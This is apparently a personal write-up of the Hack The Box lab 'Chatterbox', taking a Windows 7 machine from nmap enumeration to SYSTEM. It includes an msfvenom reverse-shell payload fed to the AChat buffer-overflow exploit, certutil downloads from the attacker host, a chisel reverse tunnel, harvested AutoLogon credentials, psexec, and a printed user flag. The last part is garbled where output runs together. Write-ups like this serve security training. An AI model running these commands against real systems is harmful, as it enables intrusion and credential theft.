Enumeration
Nmpa scan output – full scan
# Nmap 7.94SVN scan initiated Fri Nov 10 07:23:29 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/chatterbox/results/10.10.10.74/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/chatterbox/results/10.10.10.74/scans/xml/_full_tcp_nmap.xml 10.10.10.74
Increasing send delay for 10.10.10.74 from 0 to 5 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.10.74
Host is up, received user-set (0.30s latency).
Scanned at 2023-11-10 07:23:37 EST for 1303s
Not shown: 65525 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http syn-ack AChat chat system httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
9256/tcp open achat syn-ack AChat chat system
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49155/tcp open msrpc syn-ack Microsoft Windows RPC
49156/tcp open msrpc syn-ack Microsoft Windows RPC
49157/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2023-11-10T12:45:04-05:00
|_clock-skew: mean: 6h39m59s, deviation: 2h53m13s, median: 4h59m58s
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 38735/tcp): CLEAN (Couldn't connect)
| Check 2 (port 52613/tcp): CLEAN (Couldn't connect)
| Check 3 (port 64306/udp): CLEAN (Failed to receive data)
| Check 4 (port 20347/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-11-10T17:45:06
|_ start_date: 2023-11-10T17:23:14
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 10 07:45:20 2023 -- 1 IP address (1 host up) scanned in 1311.13 seconds
checking smb with CME
╭─kali@kali ~/HTB/chatterbox
╰─$ crackmapexec smb 10.10.10.74 -u '' -p '' --shares
SMB 10.10.10.74 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 10.10.10.74 445 CHATTERBOX [+] Chatterbox\:
SMB 10.10.10.74 445 CHATTERBOX [-] Error enumerating shares: STATUS_ACCESS_DENIED
╭─kali@kali ~/HTB/chatterbox
╰─$
we will tr an enumerate 9256/tcp open achat syn-ack AChat chat system
checking on searchsploit
╭─kali@kali ~/HTB/chatterbox
╰─$ searchsploit chat
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
123 Flash Chat 5.0 - Remote Code Injection | php/webapps/27121.txt
123 Flash Chat 7.8 - Multiple Vulnerabilities | php/webapps/34481.txt
123 FlashChat 7.8 - Multiple Vulnerabilities | windows/remote/14658.txt
12Planet Chat Server 2.5 - Error Message Installation Full Path Disclosure | multiple/remote/22497.txt
12Planet Chat Server 2.9 - Cross-Site Scripting | multiple/remote/24253.txt
Achat 0.150 beta7 - Remote Buffer Overflow | windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)
we will try 36025
╭─kali@kali ~/HTB/chatterbox
╰─$ searchsploit -m windows/remote/36025.py
Exploit: Achat 0.150 beta7 - Remote Buffer Overflow
URL: https://www.exploit-db.com/exploits/36025
Path: /usr/share/exploitdb/exploits/windows/remote/36025.py
Codes: CVE-2015-1578, CVE-2015-1577, OSVDB-118206, OSVDB-118104
Verified: False
File Type: Python script, ASCII text executable, with very long lines (637)
Copied to: /home/kali/HTB/chatterbox/36025.py
╭─kali@kali ~/HTB/chatterbox
╰─$
in the code
# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x9>
#Payload size: 512 bytes
we create reverse shell a payload
we know its a 32 bit from following enumeration
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.74 is 32-bit
we will create a reverse shell as below
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.16 LPORT=444 EXITFUNC=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3822 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51"
buf += b"\x41\x44\x41\x5a\x41\x42\x41\x52\x41\x4c\x41\x59"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x51\x41\x49\x41\x68"
we add this to the python script and set up listener on 444
we run the exploit
╭─kali@kali ~/HTB/chatterbox
╰─$ python2 ./36025.py
---->{P00F}!
╭─kali@kali ~/HTB/chatterbox
╰─$
we get a shell
listening on [any] 444 ...
connect to [10.10.14.16] from (UNKNOWN) [10.10.10.74] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
we get the flag
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users
12/10/2017 09:21 AM <DIR> .
12/10/2017 09:21 AM <DIR> ..
12/10/2017 01:34 PM <DIR> Administrator
12/10/2017 09:18 AM <DIR> Alfred
04/11/2011 09:21 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 3,678,101,504 bytes free
C:\Users>cd alfred
cd alfred
C:\Users\Alfred>cd desktop
cd desktop
C:\Users\Alfred\Desktop>type users.flag
type users.flag
The system cannot find the file specified.
C:\Users\Alfred\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\Users\Alfred\Desktop
12/10/2017 06:50 PM <DIR> .
12/10/2017 06:50 PM <DIR> ..
11/12/2023 07:49 AM 34 user.txt
1 File(s) 34 bytes
2 Dir(s) 3,678,101,504 bytes free
C:\Users\Alfred\Desktop>type user.txt
type user.txt
ae48274817f8eec1c2c0e4a2b6a4cce3
C:\Users\Alfred\Desktop>
**Privilege Escalation
whoami/ all
whoami /all
USER INFORMATION
----------------
User Name SID
================= =============================================
chatterbox\alfred S-1-5-21-1218242403-4263168573-589647361-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192 Mandatory group, Enabled by default, Enabled group
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
C:\Users\Alfred\Desktop>
systeminfo
\Users\Alfred\Desktop>systeminfo
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 11/12/2023, 7:49:15 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,591 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,646 MB
Virtual Memory: In Use: 449 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
H
[142]: KB3101722
[143]: KB3102429
[144]: KB3107998
[145]: KB3108371
[146]: KB3108381
[147]: KB3108664
[148]: KB3109103
[149]: KB3109560
[150]: KB3110329
[151]: KB3118401
[152]: KB3122648
[153]: KB3123479
[154]: KB3126587
[155]: KB3127220
[156]: KB3133977
[157]: KB3137061
[158]: KB3138378
[159]: KB3138612
[160]: KB3138910
[161]: KB3139398
[162]: KB3139914
[163]: KB3140245
[164]: KB3147071
[165]: KB3150220
[166]: KB3150513
[167]: KB3156016
[168]: KB3156019
[169]: KB3159398
[170]: KB3161102
[171]: KB3161949
[172]: KB3161958
[173]: KB3172605
[174]: KB3177467
[175]: KB3179573
[176]: KB3184143
[177]: KB3185319
[178]: KB4014596
[179]: KB4019990
[180]: KB4040980
[181]: KB976902
[182]: KB982018
[183]: KB4054518
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
Check with the windows exploit suggester
╭─kali@kali ~/HTB/chatterbox/Windows-Exploit-Suggester ‹master●›
╰─$ python2 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt 1 ↵
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 183 hotfix(es) against the 381 potential bulletins(s) with a database of 137 known exploits
[*] there are now 175 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*]
[E] MS16-135: Security Update for Windows Kernel-Mode Drivers (3199135) - Important
[*] https://www.exploit-db.com/exploits/40745/ -- Microsoft Windows Kernel - win32k Denial of Service (MS16-135)
[*] https://www.exploit-db.com/exploits/41015/ -- Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)
[*] https://github.com/tinysec/public/tree/master/CVE-2016-7255
[*]
[E] MS16-098: Security Update for Windows Kernel-Mode Drivers (3178466) - Important
[*] https://www.exploit-db.com/exploits/41020/ -- Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)
[*]
[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*] https://github.com/foxglovesec/RottenPotato
[*] https://github.com/Kevin-Robertson/Tater
[*] https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*] https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]
[E] MS16-074: Security Update for Microsoft Graphics Component (3164036) - Important
[*] https://www.exploit-db.com/exploits/39990/ -- Windows - gdi32.dll Multiple DIB-Related EMF Record Handlers Heap-Based Out-of-Bounds Reads/Memory Disclosure (MS16-074), PoC
[*] https://www.exploit-db.com/exploits/39991/ -- Windows Kernel - ATMFD.DLL NamedEscape 0x250C Pool Corruption (MS16-074), PoC
[*]
[E] MS16-056: Security Update for Windows Journal (3156761) - Critical
[*] https://www.exploit-db.com/exploits/40881/ -- Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)
[*] http://blog.skylined.nl/20161206001.html -- MSIE jscript9 JavaScriptStackWalker memory corruption
[*]
[M] MS16-016: Security Update for WebDAV to Address Elevation of Privilege (3136041) - Important
[*] https://www.exploit-db.com/exploits/40085/ -- MS16-016 mrxdav.sys WebDav Local Privilege Escalation, MSF
[*] https://www.exploit-db.com/exploits/39788/ -- Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2), PoC
[*] https://www.exploit-db.com/exploits/39432/ -- Microsoft Windows 7 SP1 x86 - WebDAV Privilege Escalation (MS16-016) (1), PoC
[*]
[E] MS16-014: Security Update for Microsoft Windows to Address Remote Code Execution (3134228) - Important
[*] Windows 7 SP1 x86 - Privilege Escalation (MS16-014), https://www.exploit-db.com/exploits/40039/, PoC
[*]
[E] MS16-007: Security Update for Microsoft Windows to Address Remote Code Execution (3124901) - Important
[*] https://www.exploit-db.com/exploits/39232/ -- Microsoft Windows devenum.dll!DeviceMoniker::Load() - Heap Corruption Buffer Underflow (MS16-007), PoC
[*] https://www.exploit-db.com/exploits/39233/ -- Microsoft Office / COM Object DLL Planting with WMALFXGFXDSP.dll (MS-16-007), PoC
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important
[*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC
[*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[*] done
╭─kali@kali ~/HTB/chatterbox/Windows-Exploit-Suggester ‹master●›
we will try — https://www.exploit-db.com/exploits/39432
we can check the dates of hotfixes
:\>wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn
Caption Description HotFixID InstalledOn
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2849697 12/10/2017
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2849696 12/10/2017
http://go.microsoft.com/fwlink/?LinkId=133041 Update KB2841134 12/10/2017
http://support.microsoft.com/ Update KB2670838 12/10/2017
http://support.microsoft.com/?kbid=2830477 Update KB2830477 12/10/2017
http://support.microsoft.com/ Update KB2592687 12/10/2017
http://support.microsoft.com/?kbid=2479943 Security Update KB2479943 12/10/2017
We download and copy to diirectory and compile
we try and compile but fails
╭─kali@kali ~/HTB/chatterbox
╰─$ gcc 39432.c 39432
39432.c:16:1: error: unknown type name ‘using’
16 | using System;
| ^~~~~
after research we will use mono
we installed with
sudo apt-get update
sudo apt-get install mono-complete
we compile
╭─kali@kali ~/HTB/chatterbox
╰─$ mcs 39432.c
╭─kali@kali ~/HTB/chatterbox
╰─$ ls
36025.py 39432.c 39432.exe results Windows-Exploit-Suggester
╭─kali@kali ~/HTB/chatterbox
╰─$
we serve this file and pull it to the box
serving
╭─kali@kali ~/HTB/chatterbox
╰─$ mcs 39432.c
╭─kali@kali ~/HTB/chatterbox
╰─$ ls
36025.py 39432.c 39432.exe results Windows-Exploit-Suggester
╭─kali@kali ~/HTB/chatterbox
╰─$ serve 9000
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 9000...
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
i have upoaded and attemped this but it failed and looking at the hotfixes i have seen
Microsoft released the patch for MS16-016 on February 9, 2016
The machine was last updated on
http://support.microsoft.com/?kbid=4054518 Security Update KB4054518 1/10/2018
None of the Kernel exploits would work due to the hotfixes
Serving,uploading and running winpeas
C:\temp>certutil -urlcache -split -f http://10.10.14.16:9000/winPEASx86.exe c:\temp\winPEASx86.exe
certutil -urlcache -split -f http://10.10.14.16:9000/winPEASx86.exe c:\temp\winPEASx86.exe
**** Online ****
000000 ...
247200
CertUtil: -URLCache command completed successfully.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of C:\temp
11/12/2023 09:03 AM <DIR> .
11/12/2023 09:03 AM <DIR> ..
11/12/2023 09:03 AM 2,388,480 winPEASx86.exe
1 File(s) 2,388,480 bytes
2 Dir(s) 3,661,963,264 bytes free
C:\temp>winPEASx86.exe systeminfo
winPEASx86.exe systeminfo
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
((((((((((((((((((((((((((((((((
(((((((((((((((((((((((((((((((((((((((((((
((((((((((((((**********/##########(((((((((((((
((((((((((((********************/#######(((((((((((
((((((((******************/@@@@@/****######((((((((((
((((((********************@@@@@@@@@@/***,####((((((((((
(((((********************/@@@@@%@@@@/********##(((((((((
(((############*********/%@@@@@@@@@/************((((((((
((##################(/******/@@@@@/***************((((((
((#########################(/**********************(((((
((##############################(/*****************(((((
we didnt find anything as yet
on enumeration of scheduled tasks via
C:\> schtasks /query /tn vulntask /fo list /v
ate: 1/30/2018
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 1 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: CHATTERBOX
TaskName: \Reset AChat service
Next Run Time: 11/12/2023 9:16:00 AM
Status: Ready
Logon Mode: Interactive only
Last Run Time: 11/12/2023 9:15:39 AM
Last Result: 0
Author: CHATTERBOX\Alfred
Task To Run: "C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat"
Start In: N/A
Comment: N/A
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: CHATTERBOX\Alfred
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Minute
Start Time: 5:10:40 PM
Start Date: 1/30/2018
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 0 Hour(s), 1 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
on further check on the bat file we see Achat.exe which is running as admin
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>type reset.bat
type reset.bat
taskkill /f /im AChat.exe & start /min "" "c:\Program Files\AChat\AChat.exe"
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>icacls c:\Program Files\AChat\AChat.exe
icacls c:\Program Files\AChat\AChat.exe
Invalid parameter "Files\AChat\AChat.exe"
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>cd c:\Program Files\AChat\
cd c:\Program Files\AChat\
c:\Program Files\AChat>dir
dir
Volume in drive C has no label.
Volume Serial Number is 502F-F304
Directory of c:\Program Files\AChat
12/10/2017 09:20 AM <DIR> .
12/10/2017 09:20 AM <DIR> ..
01/24/2007 11:07 PM 2,851,328 AChat.exe
12/10/2017 09:20 AM 54 AChat.url
10/17/2006 05:26 PM 365,568 AutoUp.exe
01/24/2007 11:44 PM 81,538 default.po
12/06/2005 04:53 PM 29,058 license.rtf
12/10/2017 09:20 AM <DIR> sounds
12/10/2017 09:20 AM 3,065 unins000.dat
12/10/2017 09:20 AM 678,682 unins000.exe
7 File(s) 4,009,293 bytes
3 Dir(s) 3,340,738,560 bytes free
c:\Program Files\AChat>icacls AChat.exe
icacls AChat.exe
AChat.exe NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
c:\Program Files\AChat>
The folder where the bat file is is read/aritablle
Directory of C:\Users\Alfred\AppData\Local\Microsoft\Windows Media
01/30/2018 03:59 PM <DIR> .
01/30/2018 03:59 PM <DIR> ..
12/10/2017 09:18 AM <DIR> 12.0
01/30/2018 05:12 PM 76 reset.bat
1 File(s) 76 bytes
3 Dir(s) 3,341,156,352 bytes free
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>echo test > temp.txt
echo test > temp.txt
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>icacls reset.bat
icacls reset.bat
reset.bat NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
CHATTERBOX\Alfred:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>del temp.txt
del temp.txt
C:\Users\Alfred\AppData\Local\Microsoft\Windows Media>
above was rabbit hoile
Some Autocredentials found from winpeas
���������� Home folders found
C:\Users\Administrator : Alfred [AllAccess]
C:\Users\Alfred : Alfred [AllAccess]
C:\Users\All Users
C:\Users\Default
C:\Users\Default User
C:\Users\Public : Interactive [WriteData/CreateFiles]
���������� Looking for AutoLogon credentials
Some AutoLogon credentials were found
DefaultUserName : Alfred
DefaultPassword : Welcome1!
We do a netstat to check running services and we see 445 .this wasnt showing before so muct be running as local host
C:\Windows\system32>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 356
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 716
We will try chisel
we serve and copy chisel across.
╭─kali@kali /opt/chisel
╰─$ ls
chisel_1.9.1_linux_386 chisel_1.9.1_linux_amd64 chisel_1.9.1_windows_386 chisel_1.9.1_windows_amd64
╭─kali@kali /opt/chisel
╰─$ serve 9000
The tun0 IP is 10.10.14.16 and the eth0 IP is 192.168.1.5.
Starting HTTP server on port 9000...
Serving HTTP on 0.0.0.0 port 9000 (http://0.0.0.0:9000/) ...
C:\>cd temp
cd temp
The system cannot find the path specified.
C:\>mkdir temp
mkdir temp
C:\>cd temp
cd temp
C:\temp>certutil -urlcache -split -f http://10.10.14.16:9000/chisel_1.9.1_windows_386 c:\temp\chisel_1.9.1_windows_386
certutil -urlcache -split -f http://10.10.14.16:9000/chisel_1.9.1_windows_386 c:\temp\chisel_1.9.1_windows_386
**** Online ****
000000 ...
838e00
CertUtil: -URLCache command completed successfully.
C:\temp>
on the kali machine
─kali@kali ~/HTB/chatterbox/chisel
╰─$ chmod +x chisel_1.9.1_linux_386 1 ↵
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ sudo chisel_1.9.1_linux_386 server -p 8000 --reverse
sudo: chisel_1.9.1_linux_386: command not found
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ sudo ./chisel_1.9.1_linux_386 server -p 8000 --reverse 1 ↵
2023/11/13 06:20:19 server: Reverse tunnelling enabled
2023/11/13 06:20:19 server: Fingerprint H9zO0dAUeZfvK7cwUURc5U35auqUSnQ/zsneseO3c8c=
2023/11/13 06:20:19 server: Listening on http://0.0.0.0:8000
on the windows machine
C:\temp>.\chisel_1.9.1_windows_386 client 10.10.14.16:8000 R:445:localhost:445
.\chisel_1.9.1_windows_386 client 10.10.14.16:8000 R:445:localhost:445
2023/11/13 11:21:22 client: Connecting to ws://10.10.14.16:8000
2023/11/13 11:21:24 client: Connected (Latency 306.0175ms)
We do a nmap to 445 fo the kali box
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ nmap -p 445 10.10.14.16 130 ↵
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-11-13 06:27 EST
Nmap scan report for 10.10.14.16
Host is up (0.00019s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
we try crackmapexex with the creds we had. Note that we are doing it to our kali IP
╭─kali@kali ~/HTB/chatterbox/chisel
╰─$ crackmapexec smb 10.10.14.16 -u 'Alfred' -p 'Welcome1!' --shares
SMB 10.10.14.16 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True)
SMB 10.10.14.16 445 CHATTERBOX [+] Chatterbox\Alfred:Welcome1!
SMB 10.10.14.16 445 CHATTERBOX [+] Enumerated shares
SMB 10.10.14.16 445 CHATTERBOX Share Permissions Remark
SMB 10.10.14.16 445 CHATTERBOX ----- ----------- ------
SMB 10.10.14.16 445 CHATTERBOX ADMIN$ Remote Admin
SMB 10.10.14.16 445 CHATTERBOX C$ Default share
SMB 10.10.14.16 445 CHATTERBOX IPC$ Remote IPC
Tried psexex with the credentials but this failed
╭─kali@kali /usr/share/doc/python3-impacket/examples ╰─$ ./psexec.py 'Alfred:[email protected]' cmd Impacket v0.11.0 - Copyright 2023 Fortra [*] Requesting shares on 10.10.14.16..... [-] share 'ADMIN i tried this with administrator and the same password as this may be default for admin as well.╰─$ ./psexec.py 'administrator:[email protected]' cmd 1 ↵ Impacket v0.11.0 - Copyright 2023 Fortra [*] Requesting shares on 10.10.14.16..... [*] Found writable share ADMIN$ [*] Uploading file gLNhGggU.exe [*] Opening SVCManager on 10.10.14.16..... [*] Creating service ZVTB on 10.10.14.16..... [*] Starting service ZVTB..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32> C:\Windows\system32> whoami nt authority\system C:\Windows\system32>is not writable.
[-] share 'Ci tried this with administrator and the same password as this may be default for admin as well.is not writable.
i tried this with administrator and the same password as this may be default for admin as well.